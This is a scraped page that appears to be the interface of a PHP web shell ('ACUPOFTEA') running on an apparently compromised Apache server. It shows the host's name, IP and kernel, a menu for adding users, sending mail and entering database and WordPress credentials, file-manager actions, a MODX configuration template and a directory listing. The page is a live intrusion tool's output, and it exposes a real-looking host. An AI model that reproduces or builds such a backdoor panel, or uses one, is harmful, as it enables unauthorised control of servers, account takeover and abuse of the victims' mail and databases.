System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
modx
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
config.inc.php
<?php /** * MODX Configuration file */ $database_type = 'mysql'; $database_server = '[[softdbhost]]'; $database_connection_charset = 'utf8'; $table_prefix = '[[dbprefix]]'; $dbase = '[[softdb]]'; $database_user = '[[softdbuser]]'; $database_password = '[[softdbpass]]'; $database_dsn = 'mysql:host=[[softdbhost]];dbname=[[softdb]];charset=utf8'; $config_options = array ( ); $driver_options = array ( ); $lastInstallTime = [[timestamp]]; $site_id = 'modx[[site_id]]'; $site_sessionname = 'SN[[site_sessionname]]'; $https_port = '443'; $uuid = '[[uuid]]'; if (!defined('MODX_ASSETS_PATH')) { $modx_assets_path= '[[softpath]]/assets/'; $modx_assets_url= '[[relativeurl]]/assets/'; define('MODX_ASSETS_PATH', $modx_assets_path); define('MODX_ASSETS_URL', $modx_assets_url); } if (!defined('MODX_BASE_PATH')) { $modx_base_path= '[[softpath]]/'; $modx_base_url= '[[relativeurl]]/'; define('MODX_BASE_PATH', $modx_base_path); define('MODX_BASE_URL', $modx_base_url); } if (!defined('MODX_CONNECTORS_PATH')) { $modx_connectors_path= '[[softpath]]/connectors/'; $modx_connectors_url= '[[relativeurl]]/connectors/'; define('MODX_CONNECTORS_PATH', $modx_connectors_path); define('MODX_CONNECTORS_URL', $modx_connectors_url); } if (!defined('MODX_CORE_PATH')) { $modx_core_path= '[[softpath]]/core/'; define('MODX_CORE_PATH', $modx_core_path); } if (!defined('MODX_MANAGER_PATH')) { $modx_manager_path= '[[softpath]]/manager/'; $modx_manager_url= '[[relativeurl]]/manager/'; define('MODX_MANAGER_PATH', $modx_manager_path); define('MODX_MANAGER_URL', $modx_manager_url); } if (!defined('MODX_PROCESSORS_PATH')) { $modx_processors_path= '[[softpath]]/core/src/Revolution/Processors/'; define('MODX_PROCESSORS_PATH', $modx_processors_path); } if(defined('PHP_SAPI') && (PHP_SAPI == "cli" || PHP_SAPI == "embed")) { $isSecureRequest = false; } else { $isSecureRequest = ((isset($_SERVER['HTTPS']) && !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') || parse_url('http://' . $_SERVER['HTTP_HOST'], PHP_URL_PORT) == $https_port); } if (!defined('MODX_URL_SCHEME')) { $url_scheme = $isSecureRequest ? 'https://' : 'http://'; define('MODX_URL_SCHEME', $url_scheme); } if (!defined('MODX_HTTP_HOST')) { if(defined('PHP_SAPI') && (PHP_SAPI == "cli" || PHP_SAPI == "embed")) { $http_host= '[[domhost]]'; define('MODX_HTTP_HOST', $http_host); } else { $http_host = array_key_exists('HTTP_HOST', $_SERVER) ? parse_url($url_scheme . $_SERVER['HTTP_HOST'], PHP_URL_HOST) : '[[domhost]]'; $http_port = parse_url($url_scheme . $_SERVER['HTTP_HOST'], PHP_URL_PORT); $http_host .= in_array($http_port, [null, 80, 443]) ? '' : ':' . $http_port; define('MODX_HTTP_HOST', $http_host); } } if (!defined('MODX_SITE_URL')) { $site_url= $url_scheme . $http_host . MODX_BASE_URL; define('MODX_SITE_URL', $site_url); } if (!defined('MODX_LOG_LEVEL_FATAL')) { define('MODX_LOG_LEVEL_FATAL', 0); define('MODX_LOG_LEVEL_ERROR', 1); define('MODX_LOG_LEVEL_WARN', 2); define('MODX_LOG_LEVEL_INFO', 3); define('MODX_LOG_LEVEL_DEBUG', 4); }
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-04-06 09:38:46
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2025-04-06 09:38:46
php53
DIR
-
drwxr-xr-x
2025-04-06 09:38:46
php56
DIR
-
drwxr-xr-x
2025-04-06 09:38:46
php71
DIR
-
drwxr-xr-x
2025-04-06 09:38:46
php81
DIR
-
drwxr-xr-x
2025-04-06 09:38:46
php82
DIR
-
drwxr-xr-x
2025-04-06 09:38:46
changelog.txt
text/plain
8.75 KB
-rw-r--r--
2025-04-03 05:04:46
clone.php
text/x-php
8.03 KB
-rw-r--r--
2025-04-03 07:47:38
config.core.php
text/x-php
287 B
-rw-r--r--
2021-12-23 06:54:36
config.inc.php
text/x-php
3.14 KB
-rw-r--r--
2024-12-19 04:08:46
edit.php
text/x-php
5.37 KB
-rw-r--r--
2025-04-03 07:47:38
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
extend.php
text/x-php
11.66 KB
-rw-r--r--
2025-04-03 07:47:38
fileindex.php
text/plain
72 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
3.85 KB
-rw-r--r--
2025-04-03 07:47:38
info.xml
text/html
3.78 KB
-rw-r--r--
2025-04-03 05:04:46
install.js
text/plain
921 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
6.45 KB
-rw-r--r--
2025-04-03 07:47:38
install.xml
text/html
1.05 KB
-rw-r--r--
2022-04-29 07:16:08
md5
text/plain
3.22 KB
-rw-r--r--
2025-04-03 07:47:38
modhashing.class.php
text/x-php
6.16 KB
-rw-r--r--
2021-12-23 06:54:36
modpbkdf2.class.php
text/x-php
2.45 KB
-rw-r--r--
2021-12-23 06:54:36
notes.txt
text/plain
1.52 KB
-rw-r--r--
2025-04-03 05:04:46
update_pass.php
text/x-php
672 B
-rw-r--r--
2021-12-23 06:54:36
upgrade.php
text/x-php
4 KB
-rw-r--r--
2025-04-03 07:47:38
upgrade.xml
text/plain
436 B
-rw-r--r--
2024-12-19 04:08:46
xpdo.class.php
text/x-php
129.25 KB
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com